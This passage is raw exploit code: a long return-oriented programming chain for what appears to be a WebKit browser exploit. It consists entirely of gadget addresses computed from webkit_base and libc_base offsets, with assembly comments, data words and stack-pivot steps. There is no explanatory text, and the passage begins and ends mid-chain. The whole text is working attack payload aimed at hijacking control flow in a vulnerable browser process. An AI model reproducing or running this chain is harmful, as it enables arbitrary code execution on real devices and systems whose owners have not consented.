webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+71680, //L142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+71664, //L141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L141: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L142: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L144: db([65280, 0]); // 0xff00 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+71792, //L145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L145: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760 
//pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L147: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L148: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+71976, //L150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L150: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+72032, //L151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L151: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+72144, //L153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L153: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L155: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+72264, //L158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+72248, //L156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L156: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L158: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi 
ropchain+72440, //L161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+72456, //L162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+72408, //L159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+72424, //L160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L159: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L160: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L161: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L162: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+72552, //L164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+72536, //L163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L163: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L164: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L165: db([24, 0]); // 0x18 set_gadget(libc_base+763368,); //pop rcx //L166: db([24, 0]); // 0x18 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+72704, //L168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L168: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+72760, //L169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L169: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+72896, //L173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+72880, //L172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L171: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L172: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L173: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+73016, //L174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73048, //L176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+73032, //L175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L174: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L175: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L176: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73152, //L177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73168, //L178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L177: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L178: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // 
-0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73288, //L179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73272, //L180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L180: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L179: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+73376, //L182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+73360, //L181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L182: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73480, //L183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73496, //L184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L183: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L184: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73616, //L185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73600, //L186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L186: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L185: db([0, 0]); // 0x0 //___builtin_bswap64: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73688, //L188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L188: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+73752, //L190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+73832, //L191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L193: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+73904, //L194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L194: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L196: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L197: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L199: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+74040, //L201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L201: db([0, 0]); // 0x0 set_gadgets([ webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+74096, //L203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop 
rcx ]); //L203: db([0, 0]); // 0x0 //L202: set_gadgets([ libc_base+764760, //pop rsi ropchain+74144, //L205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L205: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L207: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+74264, //L210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74248, //L208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L208: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L210: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+74440, //L213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74456, //L214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74408, //L211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+74424, //L212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L211: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L212: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L213: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L214: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74536, //L215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74552, //L216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L215: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L216: db([0, 
0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74648, //L218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+74632, //L217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L217: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74728, //L219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L219: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L220: db([4, 0]); // 0x4 set_gadget(libc_base+144605,); //pop rdi //L221: db([4, 0]); // 0x4 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74872, //L222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74904, //L224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+74888, //L223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L222: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L223: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L224: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+75080, //L226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+75096, //L227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75064, //L225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L225: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L226: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L227: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+75208, //L229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+75256, //L232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+75224, //L230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L230: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L231: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L232: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+75368, //L233+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+75360, //L233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L233: db([0, 0]); // 0x0 set_gadgets([ ropchain+75384, //L233+24 ropchain+75400, //L228 libc_base+782311, //pop rsp ropchain+75416, //L234 //L228: libc_base+782311, //pop rsp ropchain+86016, //L235 //L234: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L236: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L238: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+75552, //L241 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75536, //L239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L241: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+75696, //L244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75664, //L242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+75680, //L243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L242: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L243: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+75768, //L246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L246: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+75824, //L247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L247: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L249: db([7, 0]); // 0x7 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+75952, //L250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov 
rax, r8 libc_base+763368 //pop rcx ]); //L250: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L252: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+76072, //L255 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76056, //L253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L253: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L255: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+76248, //L258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76264, //L259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76216, //L256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+76232, //L257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L256: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L257: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L258: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L259: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+76376, //L260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76408, //L262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+76392, //L261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L260: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L261: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop 
rax //L262: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+76520, //L263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76536, //L264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L263: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L264: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+76624, //L266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+76680, //L267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L267: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+76824, //L270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76840, //L271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76808, //L269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L269: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L270: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L271: db([0, 0]); // 0x0 set_gadgets([ 
libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+77000, //L275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76968, //L273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+76984, //L274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L272: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L273: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L274: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L275: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77056, //L277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L277: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+77184, //L279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+77200, //L280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77168, //L278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L278: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L279: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L280: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+77360, //L284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+77328, //L282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77344, //L283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L281: db([24, 0]); // 0x18 
set_gadget(webkit_base+3236123,); //pop r9 //L282: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L283: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L284: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77416, //L286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L286: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+77544, //L288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+77560, //L289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77528, //L287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L287: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L289: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+77720, //L293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+77688, //L291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77704, //L292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L290: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L291: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L293: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77776, //L295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L295: db([0, 0]); // 0x0 set_gadgets([ 
